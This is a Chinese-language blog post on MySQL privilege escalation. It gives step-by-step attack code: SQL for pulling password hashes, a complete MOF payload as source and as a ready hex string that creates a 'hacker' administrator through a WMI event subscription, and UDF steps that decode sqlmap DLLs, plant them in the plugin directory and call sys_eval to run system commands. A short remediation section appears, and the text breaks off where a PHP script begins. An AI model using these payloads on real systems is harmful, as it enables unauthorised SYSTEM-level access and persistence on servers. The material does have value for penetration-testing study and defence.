<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>MySQL提权 | BaiKer</title><meta name="keywords" content="内网渗透,提权"><meta name="author" content="BaiKer"><meta name="copyright" content="BaiKer"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="MySQL提权必要条件: 具有MySQL的root权限 具有执行SQL语句的权限 查询MySQL账号密码123456# MySQL <= 5.6 版本mysql> select host, user, password from mysql.user;# MySQL >= 5.7 版本mysql > select host,user,authentication_str">
<meta property="og:type" content="article">
<meta property="og:title" content="MySQL提权">
<meta property="og:url" content="http://baiker.top/bb41611ac1d5.html">
<meta property="og:site_name" content="BaiKer">
<meta property="og:description" content="MySQL提权必要条件: 具有MySQL的root权限 具有执行SQL语句的权限 查询MySQL账号密码123456# MySQL <= 5.6 版本mysql> select host, user, password from mysql.user;# MySQL >= 5.7 版本mysql > select host,user,authentication_str">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://baiker.top/img/wallhaven-gj977q.png">
<meta property="article:published_time" content="2021-09-12T06:30:21.000Z">
<meta property="article:modified_time" content="2021-11-02T01:48:18.776Z">
<meta property="article:author" content="BaiKer">
<meta property="article:tag" content="内网渗透">
<meta property="article:tag" content="提权">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://baiker.top/img/wallhaven-gj977q.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://baiker.top/bb41611ac1d5"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: undefined,
noticeOutdate: undefined,
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '天',
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'fancybox',
Snackbar: undefined,
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: 'MySQL提权',
isPost: true,
isHome: false,
isHighlightShrink: false,
isToc: true,
postUpdate: '2021-11-02 09:48:18'
}</script><noscript><style type="text/css">
#nav {
opacity: 1
}
.justified-gallery img {
opacity: 1
}
#recent-posts time,
#post-meta time {
display: inline !important
}
</style></noscript><script>(win=>{
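win.saveToLocal = {
  // Persist `value` under `key` in localStorage together with an absolute
  // expiry timestamp derived from `ttl` (in days). A ttl of 0 stores nothing.
  set: function setWithExpiry(key, value, ttl) {
    if (ttl === 0) return
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },
  // Read `key` back. Returns undefined when the entry is absent or expired.
  // localStorage is writable by any script on this origin, so the stored text
  // is treated as untrusted: a value that is not valid JSON, or not an object,
  // is discarded instead of throwing and aborting the page bootstrap script.
  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)
    if (!itemStr) {
      return undefined
    }
    let item
    try {
      item = JSON.parse(itemStr)
    } catch (e) {
      localStorage.removeItem(key)
      return undefined
    }
    if (item === null || typeof item !== 'object') {
      localStorage.removeItem(key)
      return undefined
    }
    const now = new Date()
    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}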
// Inject a <script src=url> tag and resolve once it has loaded (rejects on
// network/load error). NOTE(review): no integrity (SRI) attribute is set, so
// whatever the CDN serves at `url` runs with full page privileges.
win.getScript = url => new Promise((resolve, reject) => {
  const tag = document.createElement('script')
  tag.src = url
  tag.async = true
  tag.onerror = reject
  const settle = function () {
    // Legacy IE reports progress through readyState; ignore intermediate states.
    const state = this.readyState
    if (state && state !== 'loaded' && state !== 'complete') return
    tag.onload = tag.onreadystatechange = null
    resolve()
  }
  tag.onload = tag.onreadystatechange = settle
  document.head.appendChild(tag)
})
// Switch the document to the dark theme and update the browser chrome colour.
win.activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  if (themeMeta !== null) themeMeta.setAttribute('content', '#0d0d0d')
}
// Switch the document to the light theme and update the browser chrome colour.
win.activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  const themeMeta = document.querySelector('meta[name="theme-color"]')
  if (themeMeta !== null) themeMeta.setAttribute('content', '#ffffff')
}
// Restore theme and sidebar preferences saved by earlier visits.
const storedTheme = saveToLocal.get('theme')
if (storedTheme === 'dark') {
  activateDarkMode()
} else if (storedTheme === 'light') {
  activateLightMode()
}
const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
  const rootClasses = document.documentElement.classList
  if (asideStatus === 'hide') rootClasses.add('hide-aside')
  else rootClasses.remove('hide-aside')
}
// Tag the root element so CSS can special-case Apple platforms (UA sniffing).
const detectApple = () => {
  const ua = navigator.userAgent
  if (/iPad|iPhone|iPod|Macintosh/.test(ua)) {
    document.documentElement.classList.add('apple')
  }
}
detectApple()
})(window)</script><meta name="referrer" content="no-referrer" /><link rel="stylesheet" href="https://baiker.top/css/essay.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Zfour/Butterfly-double-row-display@1.00/cardlistpost.css"/><meta name="generator" content="Hexo 5.4.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" 
href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://baiker.top/img/wallhaven-gj977q.png')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">BaiKer</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">MySQL提权</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-09-12T06:30:21.000Z" title="发表于 2021-09-12 14:30:21">2021-09-12</time><span class="post-meta-separator">|</span><i class="fas 
fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-11-02T01:48:18.776Z" title="更新于 2021-11-02 09:48:18">2021-11-02</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/">服务器应用漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E6%9C%8D%E5%8A%A1%E5%99%A8%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Mysql%E6%95%B0%E6%8D%AE%E5%BA%93/">Mysql数据库</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E6%8F%90%E6%9D%83/">提权</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/%E6%8F%90%E6%9D%83/%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83/">数据库提权</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">3.9k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw 
post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>21分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="MySQL提权"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h2 id="MySQL提权"><a href="#MySQL提权" class="headerlink" title="MySQL提权"></a>MySQL提权</h2><p><strong>必要条件:</strong></p>
<ul>
<li>具有MySQL的root权限(写文件需要 FILE 权限,创建/删除 UDF 需要对 <code>mysql.func</code> 的 INSERT/DELETE 权限)</li>
<li>具有执行SQL语句的权限(直连数据库,或通过 SQL 注入、数据库管理工具等间接执行)</li>
<li>下文 MOF 与 UDF 两种方法都依赖 <code>select ... into dumpfile</code> 向磁盘写文件,先执行 <code>show variables like 'secure_file_priv';</code> 检查:值为 NULL 表示禁止写文件,为某个目录则只能写入该目录(较新版本自 5.7 起默认开启此限制),为空才不受限</li>
</ul>
<h2 id="查询MySQL账号密码"><a href="#查询MySQL账号密码" class="headerlink" title="查询MySQL账号密码"></a>查询MySQL账号密码</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># MySQL <= 5.6 版本</span><br><span class="line">mysql> select host, user, password from mysql.user;</span><br><span class="line"></span><br><span class="line"># MySQL >= 5.7 版本(password 列已被 authentication_string 取代)</span><br><span class="line">mysql> select host,user,authentication_string from mysql.user;</span><br><span class="line"># 查询到的值是密码哈希而非可逆加密,需要离线破解后才能用于登录</span><br></pre></td></tr></table></figure>
<h2 id="MOF提权"><a href="#MOF提权" class="headerlink" title="MOF提权"></a>MOF提权</h2><p>利用的是 WMI 服务会自动编译 <code>C:\Windows\System32\wbem\mof</code> 目录下 MOF 文件的特性(经典写法是向该目录写入名为 <code>nullevt.mof</code> 的文件)</p>
<p>写入该目录的 MOF 文件会被 WMI 服务编译并注册为永久事件订阅;下面示例中的事件过滤器匹配 <code>Win32_LocalTime.Second = 5</code>,因此其中的脚本每分钟触发一次,向 MOF 中写入的 cmd 命令就会被反复执行</p>
<p>这段 MOF 中的 ActiveScriptEventConsumer 使用的是 JScript(<code>ScriptingEngine = "JScript"</code>,并非 VBS),脚本通过 <code>WScript.Shell</code> 调用 CMD 执行系统命令;只要 MySQL 服务账户对 mof 目录有写权限,就能借 WMI 服务的权限(通常为 SYSTEM)执行任意命令</p>
<p><strong>利用条件:</strong></p>
<ul>
<li>只适用于低版本的Windows系统(Windows Server 2003 / XP 及更早版本;之后的系统不再自动编译 mof 目录中的文件)</li>
<li>MySQL 服务运行账户对<code>C:\Windows\System32\wbem\mof</code>目录有写权限,且 <code>secure_file_priv</code> 未限制写文件</li>
</ul>
<p>上传MOF文件内容</p>
<figure class="highlight vbscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">#pragma name<span class="built_in">space</span>(<span class="string">"\\\\.\\root\\subscription"</span>) </span><br><span class="line"></span><br><span class="line">instance of __EventFilter as $EventFilter </span><br><span class="line">{ </span><br><span class="line"> EventNamespace = <span class="string">"Root\\Cimv2"</span>; </span><br><span class="line"> Name = <span class="string">"filtP2"</span>; </span><br><span class="line"> Query = <span class="string">"Select * From __InstanceModificationEvent "</span> </span><br><span class="line"> <span class="string">"Where TargetInstance Isa \"</span>Win32_LocalTime\<span class="string">" "</span> </span><br><span class="line"> <span class="string">"And TargetInstance.Second = 5"</span>; </span><br><span class="line"> QueryLanguage = <span class="string">"WQL"</span>; </span><br><span class="line">}; </span><br><span class="line"></span><br><span class="line">instance of ActiveScriptEventConsumer as $Consumer </span><br><span class="line">{ </span><br><span class="line"> Name = <span class="string">"consPCSV2"</span>; 
</span><br><span class="line"> ScriptingEngine = <span class="string">"JScript"</span>; </span><br><span class="line"> ScriptText = </span><br><span class="line"><span class="string">"var WSH = new ActiveXObject(\"</span>WScript.Shell\<span class="string">")\nWSH.run(\"</span>net.exe user hacker P@ssw0rd /add\<span class="string">")\nWSH.run(\"</span>net.exe localgroup administrators hacker /add\<span class="string">")"</span>; </span><br><span class="line">}; </span><br><span class="line"></span><br><span class="line">instance of __FilterToConsumerBinding </span><br><span class="line">{ </span><br><span class="line"> Consumer = $Consumer; </span><br><span class="line"> Filter = $EventFilter; </span><br><span class="line">};</span><br></pre></td></tr></table></figure>
<p>利用 MySQL <code>select ... into dumpfile</code> 写文件的特性把这个 MOF 文件写入 <code>C:/Windows/system32/wbem/mof/</code> 目录:将上面的代码转换为16进制,在开头添加 0x 作为十六进制字面量,以避免引号和反斜杠的转义问题(<code>dumpfile</code> 按原样写入字节,不像 <code>outfile</code> 那样做转义并追加换行)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select 0x23707261676D61206E616D65737061636528225C5C5C5C2E5C5C726F6F745C5C737562736372697074696F6E2229200A0A696E7374616E6365206F66205F5F4576656E7446696C74657220617320244576656E7446696C746572200A7B200A202020204576656E744E616D657370616365203D2022526F6F745C5C43696D7632223B200A202020204E616D6520203D202266696C745032223B200A202020205175657279203D202253656C656374202A2046726F6D205F5F496E7374616E63654D6F64696669636174696F6E4576656E742022200A20202020202020202020202022576865726520546172676574496E7374616E636520497361205C2257696E33325F4C6F63616C54696D655C222022200A20202020202020202020202022416E6420546172676574496E7374616E63652E5365636F6E64203D2035223B200A2020202051756572794C616E6775616765203D202257514C223B200A7D3B200A0A696E7374616E6365206F66204163746976655363726970744576656E74436F6E73756D65722061732024436F6E73756D6572200A7B200A202020204E616D65203D2022636F6E735043535632223B200A20202020536372697074696E67456E67696E65203D20224A536372697074223B200A2020202053637269707454657874203D200A2276617220575348203D206E657720416374697665584F626A656374285C22575363726970742E5368656C6C5C22295C6E5753482E72756E285C226E65742E6578652075736572206861636B6572205040737377307264202F6164645C22295C6E5753482E72756E285C226E65742E657865206C6F63616C67726F75702061646D696E6973747261746F7273206861636B6572202F6164645C2229223B200A7D3B200A0A696E7374616E6365206F66205F5F46696C746572546F436F6E73756D657242696E64696E67200A7B200A20202020436F6E73756D65722020203D2024436F6E73756D65723B200A2020202046696C746572203D20244576656E7446696C7465723B200A7D3B0A </span><br><span class="line">into dumpfile "C:/windows/system32/wbem/mof/test.mof";</span><br></pre></td></tr></table></figure>
<p>编译成功时,test.mof 会被移动到 <code>c:/windows/system32/wbem/mof/good/</code> 目录下,否则会出现在 <code>c:/windows/system32/wbem/mof/bad/</code> 目录下</p>
<p>随后脚本会创建 <code>hacker</code> 用户(密码 <code>P@ssw0rd</code>)并加入 administrators 组;由于 MOF 已被编译进 WMI 仓库,这个事件订阅会持续存在,仅删除 mof 文件并不能阻止它再次触发</p>
<p><strong>修复措施</strong></p><p>注意:下面删除 Repository 目录的做法会重置整个 WMI 仓库,可能影响依赖 WMI 的软件;更精确的做法是只删除 <code>root\subscription</code> 下名为 <code>filtP2</code> 的 __EventFilter、名为 <code>consPCSV2</code> 的 ActiveScriptEventConsumer 以及关联二者的 __FilterToConsumerBinding。根本上应避免以 SYSTEM 身份运行 MySQL、收紧 root 账户并设置 <code>secure_file_priv</code> 以禁止向系统目录写文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 停止 winmgmt 服务</span></span><br><span class="line">net stop winmgmt</span><br><span class="line"></span><br><span class="line"><span class="comment"># 删除 Repository 文件夹</span></span><br><span class="line">rmdir /s /q C:\Windows\system32\wbem\Repository\</span><br><span class="line"></span><br><span class="line"><span class="comment"># 手动删除 mof 文件</span></span><br><span class="line">del C:\Windows\system32\wbem\mof\good\test.mof /F /S</span><br><span class="line"></span><br><span class="line"><span class="comment"># 删除创建的用户</span></span><br><span class="line">net user hacker /delete</span><br><span class="line"></span><br><span class="line"><span class="comment"># 重新启动服务</span></span><br><span class="line">net start winmgmt</span><br></pre></td></tr></table></figure>
<h2 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h2><p>UDF(用户自定义函数)是数据库功能的一种扩展。用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用内置函数 version() 一样方便。提权利用的是 MySQL 会按 <code>SONAME</code> 加载 plugin 目录下任意动态链接库这一点:写入一个导出 <code>sys_eval</code> 的 dll,就能在数据库进程中执行系统命令。</p>
<p><strong>利用条件:</strong></p>
<p>如果是 MySQL >= 5.1 的版本,必须把 UDF 的动态链接库文件<code>udf.dll</code>放置在mysql安装目录的<code>MySQL\Lib\Plugin\</code>文件夹下,该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建<code>MySQL\Lib\Plugin\</code>文件夹,然后将udf.dll导入到该目录。</p>
<p>如果是 MySQL < 5.1 的版本,udf.dll文件在windows server 2003下放置于<code>c:/windows/system32/</code>目录,在windows server 2000下放置在<code>c:/winnt/system32/</code>目录。</p>
<p>掌握mysql数据库的root账户,从而拥有对 <code>mysql.func</code> 表的 insert 和 delete 权限,以创建(CREATE FUNCTION)和删除(DROP FUNCTION)函数。</p>
<p>拥有可以将udf.dll写入相应目录的权限(MySQL 服务账户对 plugin 目录可写,且 <code>secure_file_priv</code> 未限制);所选 dll 的位数(32/64)必须与 mysqld 进程一致,否则无法加载。</p>
<p><strong>sqlmap 的 UDF 动态链接库文件位置</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap/data/udf/mysql</span><br></pre></td></tr></table></figure>
<p><strong>这个dll文件是经过编码的,需要解码,sqlmap解码文件位置</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap/extra/cloak/cloak.py</span><br></pre></td></tr></table></figure>
<p><strong>解码方法如下</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 解码 32 位的 Linux 动态链接库(Linux 版本位于 linux/ 目录下)</span></span><br><span class="line">cloak.py -d -i ../../data/udf/mysql/linux/<span class="number">32</span>/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_32.so</span><br><span class="line"></span><br><span class="line"><span class="comment"># 解码 64 位的 Linux 动态链接库</span></span><br><span class="line">cloak.py -d -i ../../data/udf/mysql/linux/<span class="number">64</span>/lib_mysqludf_sys.so_ -o lib_mysqludf_sys_64.so</span><br><span class="line"></span><br><span class="line"><span class="comment"># 解码 32 位的 Windows 动态链接库</span></span><br><span class="line">cloak.py -d -i ../../data/udf/mysql/windows/<span class="number">32</span>/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll</span><br><span class="line"></span><br><span class="line"><span class="comment"># 解码 64 位的 Windows 动态链接库</span></span><br><span class="line">cloak.py -d -i ../../data/udf/mysql/windows/<span class="number">64</span>/lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_64.dll</span><br></pre></td></tr></table></figure>
<p><strong>查看MySQL的插件目录</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show variables like '%plugin%';</span><br></pre></td></tr></table></figure>
<p>如果没有该目录可以手动创建:下面的语句利用 NTFS 的 <code>::$INDEX_ALLOCATION</code> 数据流把 <code>plugin</code> 以目录的形式创建出来(只对 NTFS 文件系统有效)</p>
<p>需要 MySQL 服务账户对上级 <code>lib</code> 目录有写入权限</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"># 查看MySQL安装目录</span><br><span class="line">select @@basedir;</span><br><span class="line"></span><br><span class="line"># 创建/lib/plugin/文件夹</span><br><span class="line">select 1 into dumpfile 'C:\\PhpStudy\\PHPTutorial\\MySQL\\lib\\plugin::$index_allocation';</span><br></pre></td></tr></table></figure>
<p><strong>把动态链接库写入MySQL</strong></p><p>注意:<code>load_file()</code> 读取的是 MySQL 服务器本机上的文件,因此相对路径 <code>sqlmap/extra/cloak/...</code> 只有在 dll 已经存在于数据库主机上时才有效;无法直接传文件时应像 MOF 一节那样用 <code>select 0x&lt;dll的十六进制&gt; into dumpfile ...</code> 写入,或使用下面的 sqlmap <code>--file-write</code>。写二进制文件必须用 <code>into dumpfile</code>:<code>into outfile</code> 会对内容做转义并追加换行,而 <code>hex(load_file(...)) into outfile</code> 写出的是十六进制文本,二者得到的都不是可加载的 dll。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">select load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll') </span><br><span class="line">into outfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'</span><br><span class="line"></span><br><span class="line">select load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll') </span><br><span class="line">into dumpfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'</span><br><span class="line"></span><br><span class="line"># 也可以进行编码</span><br><span class="line">select hex(load_file('sqlmap/extra/cloak/lib_mysqludf_sys_64.dll')) </span><br><span class="line">into outfile 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'</span><br><span class="line"></span><br><span class="line">sqlmap.py -u http://127.0.0.1/?id=1 --file-write lib_mysqludf_sys_64.dll </span><br><span class="line">--file-dest 'C:/PhpStudy/PHPTutorial/MySQL/lib/plugin/lib_mysqludf_sys_64.dll'</span><br></pre></td></tr></table></figure>
<p><strong>创建自定义函数并调用命令</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">CREATE FUNCTION sys_eval RETURNS STRING SONAME 'lib_mysqludf_sys_64.dll';</span><br></pre></td></tr></table></figure>
<p>查看自定义函数是否创建成功</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from mysql.func;</span><br></pre></td></tr></table></figure>
<p>执行命令(命令以 mysqld 进程所属账户的权限运行,Windows 上常为 SYSTEM 或管理员,这正是提权的来源)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select sys_eval('ipconfig');</span><br></pre></td></tr></table></figure>
<p><strong>删除自定义函数</strong>(清理时还应删除写入 plugin 目录的 dll 文件)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">drop function sys_eval;</span><br></pre></td></tr></table></figure>
<p><strong>无法直连时通过Navicat上传PHP脚本</strong></p>
<p>脚本代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
